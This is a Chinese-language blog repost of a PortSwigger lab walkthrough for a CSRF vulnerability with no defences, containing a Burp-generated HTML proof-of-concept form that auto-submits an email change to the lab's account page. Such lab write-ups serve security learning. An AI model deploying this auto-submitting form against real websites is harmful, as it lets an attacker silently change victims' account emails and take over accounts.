首页 > 其他分享 >burpsuite靶场----CSRF----无防御

burpsuite靶场----CSRF----无防御

时间:2023-10-13 09:24:50浏览次数:43  
标签:submit ---- burpsuite CSRF pushState 靶场

burpsuite靶场----CSRF----无防御

靶场地址

https://portswigger.net/web-security/csrf/lab-no-defenses

正式开始

1.登录

2.更改email,抓包
3.创建poc

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a8d005f0443d44d83824cd500020014.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="wiener&#64;normal&#45;user&#46;net" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

需要稍微改正一下(填上自动提交 <script>document.forms[0].submit();</script>)

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a8d005f0443d44d83824cd500020014.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="wiener&#64;normal&#45;evil&#46;net" />
      <input type="submit" value="Submit request" />
    </form>
  <script>document.forms[0].submit();</script>
  </body>
</html>

4.点击上方的exploit server 然后发送payload

标签:submit,----,burpsuite,CSRF,pushState,靶场
From: https://www.cnblogs.com/thebeastofwar/p/17761114.html

相关文章

  • 基于 P-Tuning v2 进行 ChatGLM2-6B 微调实践
    微调类型简介1.SFT监督微调:适用于在源任务中具有较高性能的模型进行微调,学习率较小。常见任务包括中文实体识别、语言模型训练、UIE模型微调。优点是可以快速适应目标任务,但缺点是可能需要较长的训练时间和大量数据。2.LoRA微调:通过高阶矩阵秩的分解减少微调参数量,不改变预训......
  • Centos 7NTP时间同步设置
                                           iunx时间同步设置一、输入date查看系统的时间二、安装ntp软件输入yum-yinstallntp 三、更改时间配置文件vim/etc/chrony.conf设置同步时间服......
  • wsl无法启动docker
    报错信息failedtostartdaemon:Errorinitializingnetworkcontroller:errorobtainingcontrollerinstance:unabletoaddreturnruleinDOCKER-ISOLATION-STAGE-1chain:(iptablesfailed:iptables--wait-ADOCKER-ISOLATION-STAGE-1-jRETURN:iptablesv1.8.7......
  • 「Java开发指南」如何在MyEclipse中使用JPA和Spring管理事务?(一)
    本教程中介绍一些基于JPA/spring的特性,重点介绍JPA-Spring集成以及如何利用这些功能。您将学习如何:为JPA和Spring设置一个项目逆向工程数据库表来生成实体实现创建、检索、编辑和删除功能启用容器管理的事务MyEclipsev2023.1.2离线版下载MyEclipse技术交流群:742336981......
  • Win10设置本地用户限制使用指定程序与文件资源
    前言针对特定win10用户登录解决只能访问指定程序和文件,从而保证个人隐私的解决方案。一、新建本地用户账户1、在Windows10系统右键点击左下角的“开始按钮”–》设置--》账户--》将其他人添加到这台电脑。   2.在左侧用户上右键–》点“新用户”–》完成创建操作。......
  • PHP 的 Websocket 客户端和服务器
     /*------------------------------------------------------*///--需要安装websocket,我用的是下面链接提供的//--https://github.com/Textalk/websocket-php/*------------------------------------------------------*///客户端require('vendor/autoload.php');$c......
  • fastapi关掉框架自带422响应文档
    app=FastAPI()defcustom_openapi():ifnotapp.openapi_schema:app.openapi_schema=get_openapi(title=app.title,version=app.version,openapi_version=app.openapi_version,description=app.desc......
  • 2023-10-13
    一、初见成效 二、存在问题1.下载口接口:单纯用导线可以直接连接,但是不好看。2.接3.3V电源,led灯亮度不够。3.加了松香的贴片C8T6取不下来。......
  • 阅读笔记:《软件需求分析》阅读笔记二
    软件需求分析的概念:软件需求分析是软件开发过程中的关键步骤。它涉及识别和定义系统或应用程序的功能、性能和约束,以确保开发团队和利益相关者都理解项目的范围和目标。需求分析帮助消除歧义,降低风险,提高项目交付的质量。需求获取:需求的获取是需求分析的起点。这涉及与各种利益相......
  • 第三课
    时间加减法,需要更多的变量。 当两个值之间交换时,为了不影响赋值混乱,可以选择加入第三个值,作为中间量。    ......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99